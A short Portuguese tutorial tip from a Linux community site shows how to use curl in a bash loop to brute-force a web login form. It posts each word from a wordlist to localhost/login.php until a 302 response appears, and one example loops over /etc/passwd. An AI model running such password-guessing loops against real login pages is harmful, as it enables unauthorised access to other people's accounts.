cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.359 ]
cURL - Brute-force em aplicações Web
Primeiro, iremos ver algumas opções de linha de comando do cURL:
curl -h
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.
Entendo as opções:
1. As opções "-s" e "-o" são para não exibirem o conteúdo HTML do request; iremos mandar essa saída de comando para o /dev/null.
2. O comando "-F" funciona para enviar os parâmetros através de "POST request".
Exemplo:
curl -F teste=enviando-post localhost/teste.php
Exemplo:
curl -w "%{http_code}" localhost/lol
Fazendo o ataque
Agora iremos proceder para o ataque de brute-force. Primeiro, temos que saber quais os nomes dos campos que iremos enviar pelo POST request.Exemplo: login, password, log, passwd, user, etc.
Tendo essas informações, iremos transformar a saída do comando em uma variável.
Exemplo:
curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php
login=$(curl -s -o /dev/null -F login=mmxm -F pass=123456 -w "%{http_code}" localhost/login.php)
Agora, para proceder com o ataque de "word list" iremos usar o "for" para ler um arquivo linha por linha.
Exemplo:
for i in `cat /etc/passwd`;do echo $i; done
Nosso comando final ficará assim:
for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Espero que tenham gostado da dica.
[]'s
Dica também publicada em:
[Vídeo] Como criar um visualizador de imagem (Imagem em tela inteira)
Instalando programas no Mandrake/Mandriva usando cliques de mouse
Instalando LibreOffice 6.0 no Linux Mint 18
Demonstração das opções do AcetoneISO e como converter vídeo no formato flv para avi
Apt-get - hash sum incorreto: alguns arquivos de índice falharam para baixar
Habilitando NumLock em todos os terminais na inicialização
IP em modo texto (modem router)
Alterando as ID tags de seus arquivos de áudio em massa pelo terminal
Configurando acesso à VPN no Ubuntu Linux
Como fazer um pendrive butável dar boot no VirtualBox
Nenhum comentário foi encontrado.
Patrocínio
Destaques
Artigos
Automatizando digitação de códigos 2FA no browser
Resolver problemas de Internet
Como compartilhar a tela do Ubuntu com uma Smart TV (LG, Samsung, etc.)
Dicas
Como converter imagens PNG/JPEG para SVG em linha de comando
Fez porcaria no teu repositório Git? Aprenda a restaurar uma versão anterior do seu código!
Restaurando Fontes de Download do Hydra no Linux
Atualizando "na marra" o YT-DLP quando começa a dar erro de downloads
Como instalar o WPS com interface e corretor ortográfico em PT-BR no Arch Linux
Tópicos
Impossível ativar audio 5.1 (1)
Erro na atualização dos pacotes (1)
Problema com Conexão Outlook via Firewall (OpenSUSE) com Internet Fibr... (3)
Top 10 do mês
-
Xerxes
1° lugar - 61.451 pts -
Fábio Berbert de Paula
2° lugar - 44.448 pts -
Buckminster
3° lugar - 18.415 pts -
Mauricio Ferrari
4° lugar - 14.379 pts -
Alberto Federman Neto.
5° lugar - 12.164 pts -
Diego Mendes Rodrigues
6° lugar - 11.433 pts -
edps
7° lugar - 10.682 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
8° lugar - 10.443 pts -
Daniel Lara Souza
9° lugar - 10.387 pts -
Andre (pinduvoz)
10° lugar - 8.516 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
